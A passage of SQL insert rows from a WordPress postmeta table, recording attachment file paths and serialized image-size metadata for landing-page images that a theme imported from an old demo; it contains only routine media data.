(2932,841,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:750;s:6:\"height\";i:500;s:4:\"file\";s:27:\"2016/11/window-showcase.jpg\";s:8:\"filesize\";i:78422;s:5:\"sizes\";a:2:{s:6:\"medium\";a:5:{s:4:\"file\";s:27:\"window-showcase-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:11252;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:27:\"window-showcase-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6224;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(2933,841,'_the7_imported_item','old-landing'),
(2934,844,'_wp_attached_file','2016/11/vr-showcase.jpg'),
(2935,844,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:750;s:6:\"height\";i:500;s:4:\"file\";s:23:\"2016/11/vr-showcase.jpg\";s:8:\"filesize\";i:83423;s:5:\"sizes\";a:2:{s:6:\"medium\";a:5:{s:4:\"file\";s:23:\"vr-showcase-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:10841;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:23:\"vr-showcase-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:5876;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(2936,844,'_the7_imported_item','old-landing'),
(2937,883,'_wp_attached_file','2016/11/landing-headers.png'),
(2938,883,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:300;s:6:\"height\";i:200;s:4:\"file\";s:27:\"2016/11/landing-headers.png\";s:8:\"filesize\";i:8006;s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:5:{s:4:\"file\";s:27:\"landing-headers-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:8852;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(2939,883,'_the7_imported_item','old-landing'),
(2940,885,'_wp_attached_file','2016/11/landing-el.png'),
(2941,885,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:300;s:6:\"height\";i:200;s:4:\"file\";s:22:\"2016/11/landing-el.png\";s:8:\"filesize\";i:51398;s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:5:{s:4:\"file\";s:22:\"landing-el-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:30399;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(2942,885,'_the7_imported_item','old-landing'),
(2943,888,'_wp_attached_file','2016/11/landing-ecom.png'),
(2944,888,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:300;s:6:\"height\";i:200;s:4:\"file\";s:24:\"2016/11/landing-ecom.png\";s:8:\"filesize\";i:42564;s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:5:{s:4:\"file\";s:24:\"landing-ecom-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:29371;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(2945,888,'_the7_imported_item','old-landing'),
(2946,893,'_wp_attached_file','2016/11/land-lan-trans.png'),
(2947,893,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:300;s:6:\"height\";i:200;s:4:\"file\";s:26:\"2016/11/land-lan-trans.png\";s:8:\"filesize\";i:27389;s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:5:{s:4:\"file\";s:26:\"land-lan-trans-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:19136;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(2948,893,'_the7_imported_item','old-landing'),
(2949,895,'_wp_attached_file','2016/11/land-plug-inc.png'),
(2950,895,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:300;s:6:\"height\";i:200;s:4:\"file\";s:25:\"2016/11/land-plug-inc.png\";s:8:\"filesize\";i:31309;s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:5:{s:4:\"file\";s:25:\"land-plug-inc-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:23160;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(2951,895,'_the7_imported_item','old-landing'),
(2952,897,'_wp_attached_file','2016/11/land-7-rev.png'),
(2953,897,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:300;s:6:\"height\";i:200;s:4:\"file\";s:22:\"2016/11/land-7-rev.png\";s:8:\"filesize\";i:10324;s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:5:{s:4:\"file\";s:22:\"land-7-rev-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:9955;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(2954,897,'_the7_imported_item','old-landing'),
(2955,901,'_wp_attached_file','2016/11/landing-seo-google.png'),
(2956,901,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:300;s:6:\"height\";i:200;s:4:\"file\";s:30:\"2016/11/landing-seo-google.png\";s:8:\"filesize\";i:28880;s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:5:{s:4:\"file\";s:30:\"landing-seo-google-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:20370;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(2957,901,'_the7_imported_item','old-landing'),
(2958,903,'_wp_attached_file','2016/11/land-reg-upd.png'),
(2959,903,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:300;s:6:\"height\";i:200;s:4:\"file\";s:24:\"2016/11/land-reg-upd.png\";s:8:\"filesize\";i:46237;s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:5:{s:4:\"file\";s:24:\"land-reg-upd-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:27068;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(2960,903,'_the7_imported_item','old-landing'),
(2961,905,'_wp_attached_file','2016/11/landing-support.png'),
(2962,905,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:300;s:6:\"height\";i:200;s:4:\"file\";s:27:\"2016/11/landing-support.png\";s:8:\"filesize\";i:39668;s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:5:{s:4:\"file\";s:27:\"landing-support-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:22912;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(2963,905,'_the7_imported_item','old-landing'),
(2964,920,'_wp_attached_file','2016/11/stars-rating.png'),
(2965,920,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:88;s:6:\"height\";i:15;s:4:\"file\";s:24:\"2016/11/stars-rating.png\";s:8:\"filesize\";i:1825;s:5:\"sizes\";a:0:{}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(2966,920,'_the7_imported_item','old-landing'),
(2967,924,'_wp_attached_file','2016/11/the7-rating-rev.png'),
(2968,924,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:300;s:6:\"height\";i:200;s:4:\"file\";s:27:\"2016/11/the7-rating-rev.png\";s:8:\"filesize\";i:10147;s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:5:{s:4:\"file\";s:27:\"the7-rating-rev-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:9826;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(2969,924,'_the7_imported_item','old-landing'),
(2970,969,'_wp_attached_file','2016/11/steps-wiz-land.png'),
(2971,969,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:489;s:6:\"height\";i:85;s:4:\"file\";s:26:\"2016/11/steps-wiz-land.png\";s:8:\"filesize\";i:9130;s:5:\"sizes\";a:2:{s:6:\"medium\";a:5:{s:4:\"file\";s:25:\"steps-wiz-land-300x52.png\";s:5:\"width\";i:300;s:6:\"height\";i:52;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:13844;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:25:\"steps-wiz-land-150x85.png\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:3214;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(2972,969,'_the7_imported_item','old-landing'),
(2973,973,'_wp_attached_file','2016/11/2-l-tiny.png'),
(2974,973,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:666;s:6:\"height\";i:873;s:4:\"file\";s:20:\"2016/11/2-l-tiny.png\";s:8:\"filesize\";i:49134;s:5:\"sizes\";a:2:{s:6:\"medium\";a:5:{s:4:\"file\";s:20:\"2-l-tiny-229x300.png\";s:5:\"width\";i:229;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:56511;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:20:\"2-l-tiny-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:23476;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(2975,973,'_the7_imported_item','old-landing'),
(2976,974,'_wp_attached_file','2016/11/2-r-tiny.png'),
(2977,974,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:958;s:6:\"height\";i:823;s:4:\"file\";s:20:\"2016/11/2-r-tiny.png\";s:8:\"filesize\";i:83384;s:5:\"sizes\";a:3:{s:6:\"medium\";a:5:{s:4:\"file\";s:20:\"2-r-tiny-300x258.png\";s:5:\"width\";i:300;s:6:\"height\";i:258;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:65721;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:20:\"2-r-tiny-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:23721;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:20:\"2-r-tiny-768x660.png\";s:5:\"width\";i:768;s:6:\"height\";i:660;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:357502;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(2978,974,'_the7_imported_item','old-landing'),
(2979,975,'_wp_attached_file','2016/11/3-r-tiny.png'),
(2980,975,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:907;s:6:\"height\";i:420;s:4:\"file\";s:20:\"2016/11/3-r-tiny.png\";s:8:\"filesize\";i:52855;s:5:\"sizes\";a:3:{s:6:\"medium\";a:5:{s:4:\"file\";s:20:\"3-r-tiny-300x139.png\";s:5:\"width\";i:300;s:6:\"height\";i:139;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:32173;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:20:\"3-r-tiny-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:10337;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:20:\"3-r-tiny-768x356.png\";s:5:\"width\";i:768;s:6:\"height\";i:356;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:168419;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(2981,975,'_the7_imported_item','old-landing'),
(2982,976,'_wp_attached_file','2016/11/addons-hero-tiny.png'),
(2983,976,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:105;s:6:\"height\";i:105;s:4:\"file\";s:28:\"2016/11/addons-hero-tiny.png\";s:8:\"filesize\";i:2517;s:5:\"sizes\";a:0:{}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(2984,976,'_the7_imported_item','old-landing'),
(2985,977,'_wp_attached_file','2016/11/art-m-tiny.png'),
(2986,977,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1024;s:6:\"height\";i:350;s:4:\"file\";s:22:\"2016/11/art-m-tiny.png\";s:8:\"filesize\";i:99505;s:5:\"sizes\";a:3:{s:6:\"medium\";a:5:{s:4:\"file\";s:22:\"art-m-tiny-300x103.png\";s:5:\"width\";i:300;s:6:\"height\";i:103;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:47781;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:22:\"art-m-tiny-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:34132;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:22:\"art-m-tiny-768x263.png\";s:5:\"width\";i:768;s:6:\"height\";i:263;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:266894;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(2987,977,'_the7_imported_item','old-landing'),
(2988,978,'_wp_attached_file','2016/11/l-1-tiny.png'),
(2989,978,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:924;s:6:\"height\";i:1003;s:4:\"file\";s:20:\"2016/11/l-1-tiny.png\";s:8:\"filesize\";i:115052;s:5:\"sizes\";a:3:{s:6:\"medium\";a:5:{s:4:\"file\";s:20:\"l-1-tiny-276x300.png\";s:5:\"width\";i:276;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:85554;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:20:\"l-1-tiny-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:28853;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:20:\"l-1-tiny-768x834.png\";s:5:\"width\";i:768;s:6:\"height\";i:834;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:564685;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(2990,978,'_the7_imported_item','old-landing'),
(2991,979,'_wp_attached_file','2016/11/l-3-tiny.png'),
(2992,979,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1264;s:6:\"height\";i:718;s:4:\"file\";s:20:\"2016/11/l-3-tiny.png\";s:8:\"filesize\";i:77519;s:5:\"sizes\";a:4:{s:6:\"medium\";a:5:{s:4:\"file\";s:20:\"l-3-tiny-300x170.png\";s:5:\"width\";i:300;s:6:\"height\";i:170;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:31768;}s:5:\"large\";a:5:{s:4:\"file\";s:21:\"l-3-tiny-1024x582.png\";s:5:\"width\";i:1024;s:6:\"height\";i:582;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:263038;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:20:\"l-3-tiny-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:12521;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:20:\"l-3-tiny-768x436.png\";s:5:\"width\";i:768;s:6:\"height\";i:436;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:160906;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(2993,979,'_the7_imported_item','old-landing'),
(2994,980,'_wp_attached_file','2016/11/r-1-tiny.png'),
(2995,980,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1182;s:6:\"height\";i:928;s:4:\"file\";s:20:\"2016/11/r-1-tiny.png\";s:8:\"filesize\";i:114799;s:5:\"sizes\";a:4:{s:6:\"medium\";a:5:{s:4:\"file\";s:20:\"r-1-tiny-300x236.png\";s:5:\"width\";i:300;s:6:\"height\";i:236;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:56581;}s:5:\"large\";a:5:{s:4:\"file\";s:21:\"r-1-tiny-1024x804.png\";s:5:\"width\";i:1024;s:6:\"height\";i:804;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:544968;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:20:\"r-1-tiny-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:22778;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:20:\"r-1-tiny-768x603.png\";s:5:\"width\";i:768;s:6:\"height\";i:603;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:315707;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(2996,980,'_the7_imported_item','old-landing'),
(2997,981,'_wp_attached_file','2016/11/slider-logo-img-tiny.png'),
(2998,981,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:234;s:6:\"height\";i:234;s:4:\"file\";s:32:\"2016/11/slider-logo-img-tiny.png\";s:8:\"filesize\";i:4416;s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:5:{s:4:\"file\";s:32:\"slider-logo-img-tiny-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:8708;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(2999,981,'_the7_imported_item','old-landing'),
(3000,982,'_wp_attached_file','2016/11/vc-hero-tiny.png'),
(3001,982,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:87;s:6:\"height\";i:87;s:4:\"file\";s:24:\"2016/11/vc-hero-tiny.png\";s:8:\"filesize\";i:2042;s:5:\"sizes\";a:0:{}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3002,982,'_the7_imported_item','old-landing'),
(3003,983,'_wp_attached_file','2016/11/art-landing-addons-and-composer.jpg'),
